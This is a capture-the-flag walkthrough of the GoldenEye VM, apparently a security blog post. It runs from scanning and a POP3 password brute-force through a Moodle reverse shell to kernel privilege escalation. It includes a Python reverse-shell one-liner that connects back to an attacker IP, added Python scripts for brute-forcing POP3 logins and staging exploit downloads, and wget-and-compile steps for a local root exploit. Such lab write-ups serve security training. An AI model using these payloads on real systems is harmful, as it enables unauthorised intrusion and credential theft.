
GoldenEye-WALKTHROUGH

1. Host discovery

Host discovery with netdiscover: the target's IP is 192.168.203.151.

2. Port scanning

root@kali:~# nmap -sS -A 192.168.203.151 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:47 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.151
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://weakdh.org
|       https://www.securityfocus.com/bid/74733
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: 
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
MAC Address: 00:0C:29:BD:2F:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.203.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 389.82 seconds

That did not look like much, so I scanned the full port range as well:

root@kali:~# nmap -sS -p1-65535 192.168.203.151
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 01:54 EST
Nmap scan report for 192.168.203.151
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:BD:2F:E3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds

So the server exposes four ports: 25, 80, 55006 and 55007.

Port 25 is the SMTP service, used for sending mail.

3. Finding vulnerabilities

First, browse to the web service:

It tells us to log in under the /sev-home/ directory:

That path prompts for a username and password.

Run a directory scan, looking for sensitive information:

Nothing sensitive is found.

Keep looking; the clue finally turns up in the page source:

This gives a username and an encoded password:

Boris
InvincibleHack3r

The encoding is HTML entity encoding (numeric character references); it can be decoded at https://c.runoob.com/front-end/691 or with any HTML entity decoder.

The password decodes to InvincibleHack3r.

Logging in with that account failed at first; changing Boris to lowercase (boris) made the login succeed.

The page says the GNO sends mail, and that its POP3 service runs on a non-default high port.

Viewing that page's source gives more information:

Qualified GoldenEye Network Operator Supervisors: 
Natalya
Boris

We found two high ports earlier but do not yet know which one is POP3, so probe them again with Nmap (a service/version scan, -sV):

Port 55007 is the POP3 service:

Next, brute-force the POP3 service with hydra:

Because brute-forcing both usernames in a single run can produce errors, we attack the accounts one at a time.

We obtain two sets of credentials:

natalya   password: bird
boris     password: secret1!

Connect to the service with nc:

Basic POP3 commands:

user <name>       # supply the username
pass <password>   # supply the password (authentication happens here)
stat              # number of messages and their total size in bytes
list [n]          # size of every message, or of message n only
retr n            # full text of message n, terminated by a line containing a single "."
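As an added example (not code from the original post), here is the same procedure run offline in Python: a tiny POP3 server on a localhost port stands in for the GNO server on 55007, a wordlist loop that tries one account at a time does what the per-user hydra runs did, and poplib then issues the USER/PASS/STAT/RETR sequence we typed into nc. The accounts, passwords, wordlist and message bodies are constructed sample data, not the VM's real mailboxes; the toy server implements only the handful of commands listed above.

```python
import poplib
import socket
import threading
from typing import Dict, List, Tuple

# Constructed sample accounts, mailboxes and wordlist (not the VM's real data).
ACCOUNTS: Dict[str, str] = {"natalya": "bird", "boris": "secret1!"}
MAILBOXES: Dict[str, List[str]] = {
    "boris": [
        "From: hq\r\nSubject: stage 2\r\n\r\nOnce Xenia gets access to the training site "
        "we will push to our final stages.\r\n",
        "From: hq\r\nSubject: reminder\r\n\r\nChange your password.\r\n",
    ],
    "natalya": ["From: boris\r\nSubject: hosts\r\n\r\nAdd severnaya-station.com to /etc/hosts.\r\n"],
}
WORDLIST = ["password", "123456", "bird", "letmein", "secret1!"]


def _session(conn: socket.socket) -> None:
    """Serve one POP3 session: USER, PASS, STAT, LIST, RETR, QUIT (enough for this walkthrough)."""
    rf, user, authed = conn.makefile("rb"), "", False
    conn.sendall(b"+OK POP3 ready\r\n")
    while True:
        raw = rf.readline()
        if not raw:
            break                                            # client went away without QUIT
        cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user, authed = arg, False
            conn.sendall(b"+OK\r\n")
        elif cmd == "PASS":
            authed = ACCOUNTS.get(user) == arg                # the +OK/-ERR hydra keys on
            conn.sendall(b"+OK Logged in.\r\n" if authed else b"-ERR [AUTH] Authentication failed.\r\n")
        elif cmd == "QUIT":
            conn.sendall(b"+OK Bye\r\n")
            break
        elif not authed:
            conn.sendall(b"-ERR Authenticate first.\r\n")
        elif cmd == "STAT":                                  # "+OK <count> <total bytes>"
            box = MAILBOXES[user]
            conn.sendall(f"+OK {len(box)} {sum(len(m) for m in box)}\r\n".encode())
        elif cmd == "LIST":                                  # one "<n> <size>" line per message
            box = MAILBOXES[user]
            listing = "".join(f"{i} {len(m)}\r\n" for i, m in enumerate(box, 1))
            conn.sendall(f"+OK {len(box)} messages\r\n{listing}.\r\n".encode())
        elif cmd == "RETR":                                  # full text, terminated by a lone "."
            box = MAILBOXES[user]
            if arg.isdigit() and 1 <= int(arg) <= len(box):
                msg = box[int(arg) - 1]
                conn.sendall(f"+OK {len(msg)} octets\r\n{msg}.\r\n".encode())
            else:
                conn.sendall(b"-ERR no such message\r\n")
        else:
            conn.sendall(b"-ERR Unknown command.\r\n")
    conn.close()


def start_server() -> int:
    """Start the toy server on an ephemeral 127.0.0.1 port (stand-in for 55007); return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_session, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def try_login(host: str, port: int, user: str, password: str) -> bool:
    """One USER/PASS attempt; True only if the server answers +OK to PASS."""
    client = poplib.POP3(host, port, timeout=5)
    try:
        client.user(user)
        client.pass_(password)
        return True
    except poplib.error_proto:
        return False
    finally:
        client.close()


def brute_force(host: str, port: int, users: List[str], wordlist: List[str]) -> Dict[str, str]:
    """Run the wordlist against each account separately (like hydra -l <user>, one user per run)."""
    found: Dict[str, str] = {}
    for user in users:
        for candidate in wordlist:
            if try_login(host, port, user, candidate):
                found[user] = candidate
                break
    return found


def fetch_mailbox(host: str, port: int, user: str, password: str) -> List[str]:
    """Log in, STAT for the message count, then RETR each message (what we typed into nc)."""
    client = poplib.POP3(host, port, timeout=5)
    client.user(user)
    client.pass_(password)
    count, _total = client.stat()
    messages = [b"\r\n".join(client.retr(n)[1]).decode() for n in range(1, count + 1)]
    client.quit()
    return messages


def demo() -> Tuple[Dict[str, str], List[str]]:
    """Crack both accounts against the toy server, then read boris's mailbox."""
    port = start_server()
    creds = brute_force("127.0.0.1", port, ["natalya", "boris"], WORDLIST)
    return creds, fetch_mailbox("127.0.0.1", port, "boris", creds["boris"])
```

Against the real box you would point try_login/fetch_mailbox at 192.168.203.151:55007 instead of the toy server; the rest of the flow (one user per pass, then STAT/RETR) is identical.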

Read the three messages in turn:

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….

This sentence shows that Xenia is the key target.

Now log in to natalya's mailbox:

The second message gives xenia's credentials and asks us to add severnaya-station.com to the hosts file (mapped to 192.168.203.151), then visit severnaya-station.com/gnocertdir.

Browse to that hostname and log in with xenia's credentials:

The site's icon identifies the CMS as Moodle, so check searchsploit for known exploits:

Quite a few turn up; the version can be narrowed down from the marker on the Blog page:

None of them seems a close match for this version.

Looking for other clues, I find a message in my own inbox:

Brute-force doak with hydra next; the password is goat.

Log in to doak's POP3 mailbox:

The mail gives his account and password for the site; log in with them:

username: dr_doak
password: 4England!

In doak's private files there is a file:

Opening it reveals an image path: /dir007key/for-007.jpg

This is the photo:

Analyze it with strings:

Base64-decoding the string that turns up gives xWinter1995x!, which should be the admin password; log in with it:

Login succeeds, and the admin account has far more functionality.
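The strings-then-base64 step above, written out as an added Python example (not code from the original post) so it can be run offline and reused on other files: a strings() pass like the command-line tool, followed by a filter that keeps only tokens which are syntactically valid base64 and decode to printable text, which is what separates the planted secret from the ordinary strings in a JPEG. The SAMPLE_IMAGE blob is constructed here (a JPEG-like header, binary noise, a planted base64 comment and two decoy strings); the planted plaintext is the page's recovered password, encoded at runtime.

```python
import base64
import re
import string
from typing import List, Tuple

# Printable ASCII as `strings` sees it (tab and space count, other control bytes do not).
PRINTABLE = frozenset(string.printable.encode()) - frozenset(b"\n\r\x0b\x0c")
# Shape of a base64 token worth trying: alphabet only, a sensible length, optional "=" padding.
B64_TOKEN = re.compile(rb"^[A-Za-z0-9+/]{12,}={0,2}$")


def strings(data: bytes, min_len: int = 4) -> List[bytes]:
    """Mimic `strings`: every run of at least min_len printable ASCII bytes."""
    runs, current = [], bytearray()
    for byte in data + b"\x00":          # trailing sentinel flushes the final run
        if byte in PRINTABLE:
            current.append(byte)
            continue
        if len(current) >= min_len:
            runs.append(bytes(current))
        current = bytearray()
    return runs


def base64_secrets(runs: List[bytes]) -> List[Tuple[bytes, str]]:
    """(token, decoded text) for tokens that are valid base64 AND decode to printable text."""
    hits = []
    for run in runs:
        for token in run.split():        # one run can contain several space-separated words
            if not B64_TOKEN.match(token) or len(token) % 4:
                continue
            try:
                decoded = base64.b64decode(token, validate=True)
            except ValueError:           # binascii.Error is a ValueError subclass
                continue
            if decoded and all(b in PRINTABLE for b in decoded):
                hits.append((token, decoded.decode("ascii")))
    return hits


def recover_from_file(data: bytes) -> List[str]:
    """Run the strings pass and the base64 filter over one blob; return the decoded candidates."""
    return [text for _token, text in base64_secrets(strings(data))]


# Constructed stand-in for for-007.jpg. "deadbeefcafe" is a decoy: it is valid base64
# (12 chars, alphabet only) but decodes to non-printable bytes, so the filter drops it.
PLANTED = b"xWinter1995x!"
NOISE = bytes([0x00, 0xFF, 0x01, 0xFE, 0x80, 0x8F, 0x02, 0xFD]) * 6
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + NOISE
    + b"Exif comment: " + base64.b64encode(PLANTED) + b"\x00" + NOISE
    + b"Adobe Photoshop 7.0 deadbeefcafe" + NOISE + b"\xff\xd9"
)

if __name__ == "__main__":
    for run in strings(SAMPLE_IMAGE):
        print("strings:", run.decode())
    print("decoded:", recover_from_file(SAMPLE_IMAGE))
```

On a real file, replace SAMPLE_IMAGE with open("for-007.jpg", "rb").read(); lowering the 12-character minimum in B64_TOKEN catches shorter secrets at the cost of more false positives, which the printable-output check then has to weed out.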

4. Getting a shell

Go to the following location (the TinyMCE editor's "Path to aspell" setting) and replace its contents with a python reverse shell:

The code:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.203.149",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then edit a blog post and click the spell-check icon in the editor; the shell connects back:

It did not work the first time. After reading other people's write-ups I learned that the spell engine must also be changed, to PSpellShell, as shown here:

Shell obtained:

5. Privilege escalation

Once in the interactive shell, every typed character was being echoed twice, so I simply spawned another reverse shell:

Privilege escalation uses a kernel exploit:

Search for the kernel version in searchsploit:

We use this script (37292.c) to escalate:

The target has no gcc, so we use cc instead.

The difference between cc and gcc: https://www.cnblogs.com/xj626852095/p/3648246.html

Change the gcc in the exploit source (the exploit itself shells out to gcc at runtime to build a helper library, so using cc on the command line alone is not enough):

After editing, start a web server on Kali: python -m SimpleHTTPServer 8080

On the target, download the script with wget and compile it with cc: cc -o exp 37292.c:

Finally, make the generated exp executable and run it. Root obtained, and the flag!
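The staging steps above (pick the compiler the target actually has, patch the exploit's embedded gcc call, then transfer and build) as an added Python example; this is not code from the original post or from exploit-db. SAMPLE_EXPLOIT_SRC is a constructed stand-in for the downloaded source: like 37292.c, it invokes gcc from inside the program via system(), which is the reason the file has to be edited rather than just compiled with cc. The attacker address 192.168.203.149, port 8080 and the file name 37292.c are the ones used in this walkthrough; the `which` parameter exists so the compiler lookup can be simulated without a target box.

```python
import re
import shutil
from typing import Callable, Dict, List, Optional

# Constructed stand-in for the exploit source (not the real 37292.c). It contains two mentions
# of "gcc": the one inside system() must be rewritten, the one in printf() must be left alone.
SAMPLE_EXPLOIT_SRC = r'''
#include <stdlib.h>
#include <stdio.h>
int main(void) {
    /* builds a helper shared object at runtime, so a compiler must exist on the target */
    int rc = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    printf("gcc returned %d\n", rc);
    return rc;
}
'''

PREFERENCE = ("gcc", "cc", "clang", "tcc")
# Matches the compiler name only when it opens a system("...") command string.
SYSTEM_CALL = re.compile(r'(system\(\s*")gcc(?=\s)')


def pick_compiler(which: Callable[[str], Optional[str]] = shutil.which) -> Optional[str]:
    """First compiler from PREFERENCE found on PATH; None if the box has no compiler at all."""
    for name in PREFERENCE:
        if which(name):
            return name
    return None


def patch_compiler(src: str, compiler: str) -> str:
    """Rewrite gcc -> compiler inside system() command strings, leaving other text untouched."""
    return SYSTEM_CALL.sub(lambda m: m.group(1) + compiler, src)


def transfer_and_build(attacker: str, port: int, filename: str, compiler: str) -> List[str]:
    """Commands to run on the target once Kali serves the patched file over HTTP."""
    return [
        f"cd /tmp && wget http://{attacker}:{port}/{filename}",
        f"{compiler} -o exp {filename}",
        "chmod +x exp",
        "./exp",
    ]


def stage(src: str, which: Callable[[str], Optional[str]] = shutil.which,
          attacker: str = "192.168.203.149", port: int = 8080,
          filename: str = "37292.c") -> Optional[Dict[str, object]]:
    """Choose a compiler, patch the source for it and list the target-side commands."""
    compiler = pick_compiler(which)
    if compiler is None:
        return None
    return {
        "compiler": compiler,
        "source": patch_compiler(src, compiler),
        "commands": transfer_and_build(attacker, port, filename, compiler),
    }


if __name__ == "__main__":
    # Simulate the GoldenEye target: cc present, gcc absent.
    only_cc = lambda name: "/usr/bin/cc" if name == "cc" else None
    result = stage(SAMPLE_EXPLOIT_SRC, which=only_cc)
    print(result["source"])
    print("\n".join(result["commands"]))
```

In practice you would run pick_compiler's check on the target (`which gcc cc clang tcc`), patch the file on Kali with the chosen name, and only then start SimpleHTTPServer; the regex deliberately anchors on `system("` so that comments, printf strings and option names containing "gcc" are not rewritten.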

 

 

Reproduction without permission prohibited: HackerGu's Blog » GoldenEye-WALKTHROUGH